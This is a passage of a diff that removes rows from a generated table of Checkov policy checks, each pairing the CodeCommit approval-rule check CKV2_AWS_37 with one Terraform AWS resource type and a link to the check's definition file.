-| 1061 | CKV2_AWS_37              | resource                         | aws_ebs_default_kms_key                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1062 | CKV2_AWS_37              | resource                         | aws_ebs_encryption_by_default                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1063 | CKV2_AWS_37              | resource                         | aws_ebs_snapshot                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1064 | CKV2_AWS_37              | resource                         | aws_ebs_snapshot_copy                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1065 | CKV2_AWS_37              | resource                         | aws_ebs_volume                                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1066 | CKV2_AWS_37              | resource                         | aws_ec2_availability_zone_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1067 | CKV2_AWS_37              | resource                         | aws_ec2_capacity_reservation                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1068 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_authorization_rule                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1069 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_endpoint                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1070 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_network_association                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1071 | CKV2_AWS_37              | resource                         | aws_ec2_client_vpn_route                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1072 | CKV2_AWS_37              | resource                         | aws_ec2_fleet                                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1073 | CKV2_AWS_37              | resource                         | aws_ec2_local_gateway_route                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1074 | CKV2_AWS_37              | resource                         | aws_ec2_local_gateway_route_table_vpc_association                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1075 | CKV2_AWS_37              | resource                         | aws_ec2_tag                                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1076 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_filter                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1077 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_filter_rule                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1078 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_session                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1079 | CKV2_AWS_37              | resource                         | aws_ec2_traffic_mirror_target                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1080 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1081 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_peering_attachment                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1082 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_peering_attachment_accepter                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1083 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1084 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1085 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table_association                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1086 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_route_table_propagation                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1087 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_vpc_attachment                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1088 | CKV2_AWS_37              | resource                         | aws_ec2_transit_gateway_vpc_attachment_accepter                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1089 | CKV2_AWS_37              | resource                         | aws_ecr_lifecycle_policy                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1090 | CKV2_AWS_37              | resource                         | aws_ecr_repository                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1091 | CKV2_AWS_37              | resource                         | aws_ecr_repository_policy                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1092 | CKV2_AWS_37              | resource                         | aws_ecs_capacity_provider                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1093 | CKV2_AWS_37              | resource                         | aws_ecs_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1094 | CKV2_AWS_37              | resource                         | aws_ecs_service                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1095 | CKV2_AWS_37              | resource                         | aws_ecs_task_definition                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1096 | CKV2_AWS_37              | resource                         | aws_efs_access_point                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1097 | CKV2_AWS_37              | resource                         | aws_efs_file_system                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1098 | CKV2_AWS_37              | resource                         | aws_efs_file_system_policy                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1099 | CKV2_AWS_37              | resource                         | aws_efs_mount_target                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1100 | CKV2_AWS_37              | resource                         | aws_egress_only_internet_gateway                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1101 | CKV2_AWS_37              | resource                         | aws_eip                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1102 | CKV2_AWS_37              | resource                         | aws_eip_association                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1103 | CKV2_AWS_37              | resource                         | aws_eks_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1104 | CKV2_AWS_37              | resource                         | aws_eks_fargate_profile                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1105 | CKV2_AWS_37              | resource                         | aws_eks_node_group                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1106 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_application                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1107 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_application_version                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1108 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_configuration_template                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1109 | CKV2_AWS_37              | resource                         | aws_elastic_beanstalk_environment                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1110 | CKV2_AWS_37              | resource                         | aws_elasticache_cluster                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1111 | CKV2_AWS_37              | resource                         | aws_elasticache_parameter_group                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1112 | CKV2_AWS_37              | resource                         | aws_elasticache_replication_group                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1113 | CKV2_AWS_37              | resource                         | aws_elasticache_security_group                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1114 | CKV2_AWS_37              | resource                         | aws_elasticache_subnet_group                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1115 | CKV2_AWS_37              | resource                         | aws_elasticsearch_domain                                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1116 | CKV2_AWS_37              | resource                         | aws_elasticsearch_domain_policy                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1117 | CKV2_AWS_37              | resource                         | aws_elastictranscoder_pipeline                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1118 | CKV2_AWS_37              | resource                         | aws_elastictranscoder_preset                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1119 | CKV2_AWS_37              | resource                         | aws_elb                                                                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1120 | CKV2_AWS_37              | resource                         | aws_elb_attachment                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1121 | CKV2_AWS_37              | resource                         | aws_emr_cluster                                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1122 | CKV2_AWS_37              | resource                         | aws_emr_instance_group                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1123 | CKV2_AWS_37              | resource                         | aws_emr_security_configuration                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1124 | CKV2_AWS_37              | resource                         | aws_flow_log                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1125 | CKV2_AWS_37              | resource                         | aws_fms_admin_account                                                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1126 | CKV2_AWS_37              | resource                         | aws_fsx_lustre_file_system                                                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1127 | CKV2_AWS_37              | resource                         | aws_fsx_windows_file_system                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1128 | CKV2_AWS_37              | resource                         | aws_gamelift_alias                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1129 | CKV2_AWS_37              | resource                         | aws_gamelift_build                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1130 | CKV2_AWS_37              | resource                         | aws_gamelift_fleet                                                                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1131 | CKV2_AWS_37              | resource                         | aws_gamelift_game_session_queue                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1132 | CKV2_AWS_37              | resource                         | aws_glacier_vault                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1133 | CKV2_AWS_37              | resource                         | aws_glacier_vault_lock                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1134 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_accelerator                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1135 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_endpoint_group                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1136 | CKV2_AWS_37              | resource                         | aws_globalaccelerator_listener                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1137 | CKV2_AWS_37              | resource                         | aws_glue_catalog_database                                                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1138 | CKV2_AWS_37              | resource                         | aws_glue_catalog_table                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1139 | CKV2_AWS_37              | resource                         | aws_glue_classifier                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1140 | CKV2_AWS_37              | resource                         | aws_glue_connection                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1141 | CKV2_AWS_37              | resource                         | aws_glue_crawler                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1142 | CKV2_AWS_37              | resource                         | aws_glue_job                                                                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1143 | CKV2_AWS_37              | resource                         | aws_glue_security_configuration                                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1144 | CKV2_AWS_37              | resource                         | aws_glue_trigger                                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1145 | CKV2_AWS_37              | resource                         | aws_glue_workflow                                                                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1146 | CKV2_AWS_37              | resource                         | aws_guardduty_detector                                                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1147 | CKV2_AWS_37              | resource                         | aws_guardduty_invite_accepter                                                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1148 | CKV2_AWS_37              | resource                         | aws_guardduty_ipset                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1149 | CKV2_AWS_37              | resource                         | aws_guardduty_member                                                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-| 1150 | CKV2_AWS_37              | resource                         | aws_guardduty_organization_admin_account                                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
